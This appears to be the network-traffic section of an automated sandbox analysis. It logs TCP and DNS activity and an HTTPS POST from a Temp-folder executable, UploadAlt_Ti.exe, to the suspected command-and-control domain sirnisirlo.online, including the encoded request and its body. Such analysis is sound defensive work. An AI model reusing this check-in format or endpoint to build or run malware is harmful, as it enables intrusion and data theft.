Nov 14, 2024 19:58:28.522809029 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.346635103 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.347546101 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.347661018 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.347681046 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.347737074 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.347817898 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.347826958 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.347855091 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.347910881 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.348119974 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.348272085 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.348328114 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.348351955 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.397299051 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.397341967 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.444199085 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.465256929 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.506711006 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.506788015 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.553679943 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.598794937 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.599508047 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.599592924 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.599620104 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.602384090 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.602447987 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.602466106 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.605433941 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.605494022 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.605510950 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.608511925 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.608572960 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.608591080 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.611437082 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.611495972 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.611512899 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.662925005 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.716104031 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.716202974 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.716286898 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.716310024 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.722981930 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.723037958 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.723077059 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.723093033 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.723104000 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.723136902 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.725446939 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.725486994 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.725492954 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.725500107 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.725537062 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.725543022 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.728492975 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.728579998 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.728586912 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.772443056 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.851443052 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.852169037 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.852356911 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.852381945 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.855223894 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.855273962 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.855283022 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.857937098 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.857990980 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.870860100 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.870881081 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.870897055 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.870903969 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.929722071 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.929773092 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:29.929873943 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.930185080 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:29.930202007 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:30.627027035 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:30.627206087 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:30.628720999 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:30.628731966 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:30.629257917 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:30.630367994 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:30.630410910 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:30.630482912 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.202656984 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.202900887 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.202991009 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.203677893 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.203699112 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.203711987 CET	58021	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.203716040 CET	443	58021	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.277739048 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.277853966 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.277962923 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.278283119 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.278317928 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.965636969 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.965750933 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.967514038 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.967529058 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.967935085 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:31.968764067 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.968797922 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:31.968802929 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:32.385138035 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:32.385298014 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:32.385377884 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:32.385442972 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:32.385442972 CET	58022	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:32.385483980 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:32.385510921 CET	443	58022	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:33.631273985 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:33.631341934 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:33.631428003 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:33.631849051 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:33.631860971 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.453936100 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.454170942 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.455389977 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.455399990 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.455787897 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.456621885 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.457377911 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.457412004 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.457511902 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.457545042 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.457653046 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.457684994 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.457834959 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.457863092 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.458003998 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.458036900 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.458199978 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.458235025 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.458245993 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.458408117 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.458446026 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.467824936 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.467982054 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.468045950 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.468069077 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.468092918 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.468326092 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.468369007 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.468391895 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.468420982 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.468523026 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.468568087 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.473248959 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.473426104 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.473464966 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:34.473472118 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:34.515348911 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:35.589370012 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:35.589432955 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:35.589675903 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:35.589675903 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:35.589675903 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:35.599911928 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:35.599967957 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:35.600177050 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:35.600358009 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:35.600369930 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:35.803566933 CET	58023	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:35.803603888 CET	443	58023	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.337291956 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.337589979 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.365103960 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.365127087 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.366229057 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.367419958 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.367439032 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.367445946 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.873728037 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.873799086 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.873980045 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.874026060 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.874043941 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.874043941 CET	58024	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.874054909 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.874063969 CET	443	58024	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.923922062 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.923954010 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:36.924145937 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.924333096 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:36.924346924 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:37.607780933 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:37.607860088 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:37.609132051 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:37.609143019 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:37.609376907 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:37.610068083 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:37.610088110 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:37.610096931 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.113522053 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.113594055 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.113831997 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.114042997 CET	58025	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.114072084 CET	443	58025	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.178040981 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.178080082 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.178148031 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.178864956 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.178879023 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.797825098 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.797928095 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.822906971 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.822932005 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.823185921 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:38.834121943 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.834141970 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:38.834150076 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.105848074 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.105921030 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.106081963 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.106246948 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.106271982 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.106286049 CET	58026	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.106291056 CET	443	58026	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.172326088 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.172378063 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.172473907 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.172779083 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.172797918 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.869899988 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.870099068 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.871434927 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.871449947 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.871690035 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:39.876110077 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.876146078 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:39.876219034 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:40.384577036 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:40.384639025 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:40.384730101 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:40.384864092 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:40.384887934 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:40.384906054 CET	58027	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:40.384912968 CET	443	58027	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:40.566118956 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:40.566159964 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:40.566255093 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:40.566514015 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:40.566523075 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:41.516307116 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:41.516372919 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:41.517528057 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:41.517535925 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:41.517810106 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:41.518459082 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:41.518599033 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:41.518625975 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:41.519047022 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:41.519077063 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:41.519185066 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:41.519239902 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:41.519328117 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:41.519335032 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:42.332005024 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:42.332215071 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:42.332293987 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:42.332325935 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:42.332345963 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:42.332355022 CET	58028	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:42.332359076 CET	443	58028	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:42.338623047 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:42.338713884 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:42.338784933 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:42.339027882 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:42.339046955 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.224675894 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.224848986 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:43.226366997 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:43.226389885 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.226840973 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.227483988 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:43.268419981 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:43.268465996 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.790915012 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.791105986 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.791165113 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:43.791229963 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:43.791250944 CET	443	58029	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:43.791270971 CET	58029	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:43.791276932 CET	443	58029	188.114.96.3	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 19:57:34.111069918 CET	53	50091	162.159.36.2	192.168.2.8
Nov 14, 2024 19:57:34.717989922 CET	51797	53	192.168.2.8	1.1.1.1
Nov 14, 2024 19:57:34.749588966 CET	53	51797	1.1.1.1	192.168.2.8
Nov 14, 2024 19:57:44.944796085 CET	58592	53	192.168.2.8	1.1.1.1
Nov 14, 2024 19:57:44.991432905 CET	53	58592	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 14, 2024 19:57:34.717989922 CET	192.168.2.8	1.1.1.1	0x4675	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Nov 14, 2024 19:57:44.944796085 CET	192.168.2.8	1.1.1.1	0xadc4	Standard query (0)	sirnisirlo.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 14, 2024 19:57:34.749588966 CET	1.1.1.1	192.168.2.8	0x4675	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Nov 14, 2024 19:57:44.991432905 CET	1.1.1.1	192.168.2.8	0xadc4	No error (0)	sirnisirlo.online		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 14, 2024 19:57:44.991432905 CET	1.1.1.1	192.168.2.8	0xadc4	No error (0)	sirnisirlo.online		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sirnisirlo.online

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	58009	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:45 UTC	338	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Length: 96 Host: sirnisirlo.online
2024-11-14 18:57:45 UTC	96	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-11-14 18:57:46 UTC	809	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:57:46 GMT Transfer-Encoding: chunked Connection: close sid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpMMZFXG82ag4%2FziD2bXt1hCLI36m84mKV50ZwnGdmfhg8GUBuz%2Fbzg11HGP1NnEvW8143jbSdex%2FD%2F1N0M8k5n0EWa8vdvx519us0nnUzu4IdAVWBC8uoQDLnK%2BFi3Osd2OzQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293aa6ead5d789-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=139042&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1070&delivery_rate=20815&cwnd=32&unsent_bytes=0&cid=a8e479ef8ba4d8b8&ts=893&x=0"
